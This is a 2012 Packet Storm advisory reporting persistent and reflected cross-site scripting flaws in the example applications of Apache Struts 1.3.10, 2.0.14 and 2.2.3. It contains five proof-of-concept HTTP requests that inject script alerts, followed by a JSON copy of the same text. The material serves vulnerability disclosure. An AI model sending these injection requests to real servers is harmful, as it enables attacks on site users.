Apache Struts 1.3.10 / 2.0.14 / 2.2.3 Cross Site Scripting
2012-02-03T00:00:00
ID PACKETSTORM:109378 Type packetstorm Reporter Antu Sanadi Modified 2012-02-03T00:00:00
Description
`##############################################################################
#
# Title : Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
# Author : Antu Sanadi SecPod Technologies (www.secpod.com)
# Vendor : http://struts.apache.org/
# Advisory : http://secpod.org/blog/?p=450
# http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt
# Software : Apache struts 1.3.10, 2.0.14 and 2.2.3
# Date : 01/02/2012
#
##############################################################################
SecPod ID: 1021 21/07/2011 Issue Discovered
03/08/2011 Vendor Notified
No Response
01/02/2012 Advisory Released
Class: Cross-Site Scripting (Persistence) Severity: High
Overview:
---------
Apache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities.
Technical Description:
----------------------
Multiple persistence Cross-Site Scripting vulnerabilities are present in
Apache Struts, as it fails to sanitise user-supplied input.
i) Input passed via the 'name' and 'lastName' parameter in
'/struts2-showcase/person/editPerson.action' is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
ii) Input passed via the 'clientName' parameter in
'/struts2-rest-showcase/orders' action is not properly verified before
it is returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in the context of a
vulnerable site.
iii) Input passed via the 'name' parameter in
'/struts-examples/upload/upload-submit.do?queryParam=Successful' action
is not properly verified before it is returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in the context of a vulnerable site.
iV) Input passed via the 'message' parameter in
'/struts-cookbook/processSimple.do' action is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
V) Input passed via the 'message' parameter in
'/struts-cookbook/processSimple.do' action is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
These vulnerabilities have been tested on Apache Struts2 v2.2.3,
Apache Struts2 v2.0.14 and Apache Struts v1.3.10.
Other versions may also be affected.
Impact:
--------
Successful exploitation could allow an attacker to execute arbitrary HTML
code in a user's browser session in the context of a vulnerable application.
Affected Software:
------------------
Apache struts 2.2.3 and prior.
Tested on,
i) Apache struts 2.2.3 - Stored XSS
- struts2-showcase-2.2.3
- struts2-rest-showcase-2.2.3
ii) Apache struts 2.0.14 - Stored XSS
- struts2-showcase-2.0.14
iii) Apache struts 1.3.10 - Reflected XSS
- struts-cookbook-1.3.10
- struts-examples-1.3.10
References:
-----------
http://struts.apache.org
http://secpod.org/blog/?p=450
Proof of Concept:
-----------------
POC 1:
-----
Stored XSS
POST struts2-showcase/person/editPerson.action HTTP/1.1
Host: SERVER_IP:8080
User-Agent: struts2-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Post Data:
----------
persons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript
%3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2
Fscript%3E&method%3Asave=Save+all+persons
POC 2:
-----
Stored XSS
POST /struts2-rest-showcase/orders HTTP/1.1
Host: SERVER_IP:8080
User-Agent: struts2-rest-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Post Data:
----------
clientName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&amount=
POC 3:
-----
Reflected XSS
POST /struts-examples/upload/upload-submit.do?queryParam=Successful HTTP/1.1
Host: SERVER_IP:8080
User-Agent: Struts-examples XSS-TEST
Content-Type: multipart/form-data; boundary=---------------------------41701
161044225432961947041
Content-Length: 481
Post Data:
----------
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="theText"\r\n
\r\n
<script>alert("SecPod-XSS-TEST")</script>\r\n
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="theFile"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="filePath"\r\n
\r\n
\r\n
-----------------------------41701161044225432961947041--\r\n
POC 4:
-----
Reflected XSS
POST /struts-cookbook/processSimple.do HTTP/1.1
Host: SERVER_IP:8080
User-Agent:Struts-cookbook XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Post Data:
----------
name=XYZ&secret=XYZ&color=red&confirm=on&rating=1&message=%3Cscript%3Ealert
%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&
POC 5:
-----
Reflected XSS
POST /struts-cookbook/processDyna.do HTTP/1.1
Host: SERVER_IP:8080
User-Agent:Struts-cookbook XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Post Data:
----------
name=ZYZ&secret=&color=red&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST
%22%29%3C%2Fscript%3E&
Solution:
---------
Fix not available
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 6.4 (High) (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.
`
{"type": "packetstorm", "published": "2012-02-03T00:00:00", "reporter": "Antu Sanadi", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "15a05646cbb2763e6a1763c738eefdbe"}, {"key": "modified", "hash": "76fc9b31181630afc4c25b5db7af226a"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "76fc9b31181630afc4c25b5db7af226a"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ce29fd8f57b0b40839d5e7f2f02802c1"}, {"key": "sourceData", "hash": "6178eac6a1216af3dc275925252c87ef"}, {"key": "sourceHref", "hash": "2275770b72b773bb47bf6dc7ee527c6d"}, {"key": "title", "hash": "53d026197c8242f31f48e7419d9dea42"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`############################################################################## \n# \n# Title : Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities \n# Author : Antu Sanadi SecPod Technologies (www.secpod.com) \n# Vendor : http://struts.apache.org/ \n# Advisory : http://secpod.org/blog/?p=450 \n# http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt \n# Software : Apache struts 1.3.10, 2.0.14 and 2.2.3 \n# Date : 01/02/2012 \n# \n############################################################################## \n \nSecPod ID: 1021 21/07/2011 Issue Discovered \n03/08/2011 Vendor Notified \nNo Response \n01/02/2012 Advisory Released \n \nClass: Cross-Site Scripting (Persistence) Severity: High \n \n \nOverview: \n--------- \nApache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities. \n \n \nTechnical Description: \n---------------------- \nMultiple persistence Cross-Site Scripting vulnerabilities are present in \nApache Struts, as it fails to sanitise user-supplied input. \n \ni) Input passed via the 'name' and 'lastName' parameter in \n'/struts2-showcase/person/editPerson.action' is not properly verified \nbefore it is returned to the user. This can be exploited to execute \narbitrary HTML and script code in a user's browser session in the \ncontext of a vulnerable site. \n \nii) Input passed via the 'clientName' parameter in \n'/struts2-rest-showcase/orders' action is not properly verified before \nit is returned to the user. This can be exploited to execute arbitrary \nHTML and script code in a user's browser session in the context of a \nvulnerable site. \n \niii) Input passed via the 'name' parameter in \n'/struts-examples/upload/upload-submit.do?queryParam=Successful' action \nis not properly verified before it is returned to the user. This can be \nexploited to execute arbitrary HTML and script code in a user's browser \nsession in the context of a vulnerable site. \n \niV) Input passed via the 'message' parameter in \n'/struts-cookbook/processSimple.do' action is not properly verified \nbefore it is returned to the user. This can be exploited to execute \narbitrary HTML and script code in a user's browser session in the \ncontext of a vulnerable site. \n \nV) Input passed via the 'message' parameter in \n'/struts-cookbook/processSimple.do' action is not properly verified \nbefore it is returned to the user. This can be exploited to execute \narbitrary HTML and script code in a user's browser session in the \ncontext of a vulnerable site. \n \nThese vulnerabilities have been tested on Apache Struts2 v2.2.3, \nApache Struts2 v2.0.14 and Apache Struts v1.3.10. \nOther versions may also be affected. \n \n \nImpact: \n-------- \nSuccessful exploitation could allow an attacker to execute arbitrary HTML \ncode in a user's browser session in the context of a vulnerable application. \n \n \nAffected Software: \n------------------ \nApache struts 2.2.3 and prior. \n \nTested on, \ni) Apache struts 2.2.3 - Stored XSS \n- struts2-showcase-2.2.3 \n- struts2-rest-showcase-2.2.3 \n \nii) Apache struts 2.0.14 - Stored XSS \n- struts2-showcase-2.0.14 \n \niii) Apache struts 1.3.10 - Reflected XSS \n- struts-cookbook-1.3.10 \n- struts-examples-1.3.10 \n \n \nReferences: \n----------- \nhttp://struts.apache.org \nhttp://secpod.org/blog/?p=450 \n \n \nProof of Concept: \n----------------- \n \nPOC 1: \n----- \nStored XSS \n \nPOST struts2-showcase/person/editPerson.action HTTP/1.1 \n \nHost: SERVER_IP:8080 \nUser-Agent: struts2-showcase XSS-TEST \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 192 \n \nPost Data: \n---------- \npersons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript \n%3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2 \nFscript%3E&method%3Asave=Save+all+persons \n \n \nPOC 2: \n----- \nStored XSS \n \nPOST /struts2-rest-showcase/orders HTTP/1.1 \n \nHost: SERVER_IP:8080 \nUser-Agent: struts2-rest-showcase XSS-TEST \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 78 \n \nPost Data: \n---------- \nclientName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&amount= \n \n \nPOC 3: \n----- \nReflected XSS \n \nPOST /struts-examples/upload/upload-submit.do?queryParam=Successful HTTP/1.1 \n \nHost: SERVER_IP:8080 \nUser-Agent: Struts-examples XSS-TEST \nContent-Type: multipart/form-data; boundary=---------------------------41701 \n161044225432961947041 \nContent-Length: 481 \n \nPost Data: \n---------- \n-----------------------------41701161044225432961947041\\r\\n \nContent-Disposition: form-data; name=\"theText\"\\r\\n \n\\r\\n \n<script>alert(\"SecPod-XSS-TEST\")</script>\\r\\n \n-----------------------------41701161044225432961947041\\r\\n \nContent-Disposition: form-data; name=\"theFile\"; filename=\"\"\\r\\n \nContent-Type: application/octet-stream\\r\\n \n\\r\\n \n\\r\\n \n-----------------------------41701161044225432961947041\\r\\n \nContent-Disposition: form-data; name=\"filePath\"\\r\\n \n\\r\\n \n\\r\\n \n-----------------------------41701161044225432961947041--\\r\\n \n \n \nPOC 4: \n----- \nReflected XSS \n \nPOST /struts-cookbook/processSimple.do HTTP/1.1 \n \nHost: SERVER_IP:8080 \nUser-Agent:Struts-cookbook XSS-TEST \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 118 \n \nPost Data: \n---------- \nname=XYZ&secret=XYZ&color=red&confirm=on&rating=1&message=%3Cscript%3Ealert \n%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E& \n \n \nPOC 5: \n----- \nReflected XSS \n \nPOST /struts-cookbook/processDyna.do HTTP/1.1 \n \nHost: SERVER_IP:8080 \nUser-Agent:Struts-cookbook XSS-TEST \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 95 \n \nPost Data: \n---------- \nname=ZYZ&secret=&color=red&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST \n%22%29%3C%2Fscript%3E& \n \n \nSolution: \n--------- \nFix not available \n \n \nRisk Factor: \n------------- \nCVSS Score Report: \nACCESS_VECTOR = NETWORK \nACCESS_COMPLEXITY = LOW \nAUTHENTICATION = NONE \nCONFIDENTIALITY_IMPACT = PARTIAL \nINTEGRITY_IMPACT = PARTIAL \nAVAILABILITY_IMPACT = NONE \nEXPLOITABILITY = PROOF_OF_CONCEPT \nREMEDIATION_LEVEL = UNAVAILABLE \nREPORT_CONFIDENCE = CONFIRMED \nCVSS Base Score = 6.4 (High) (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \nCredits: \n-------- \nAntu Sanadi of SecPod Technologies has been credited with the discovery of this \nvulnerability. \n \n`\n", "viewCount": 2, "history": [], "lastseen": "2016-11-03T10:23:48", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/109378/Apache-Struts-1.3.10-2.0.14-2.2.3-Cross-Site-Scripting.html", "sourceHref": "https://packetstormsecurity.com/files/download/109378/apachestruts-xss.txt", "title": "Apache Struts 1.3.10 / 2.0.14 / 2.2.3 Cross Site Scripting", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-11-03T10:23:48"}, "dependencies": {"references": [], "modified": "2016-11-03T10:23:48"}, "vulnersScore": 0.1}, "references": [], "id": "PACKETSTORM:109378", "hash": "7f5cebfb7610a15bb381bf3efeb06dc399504e1dac638b179e2d5ce455fa56d9", "edition": 1, "cvelist": [], "modified": "2012-02-03T00:00:00", "description": ""}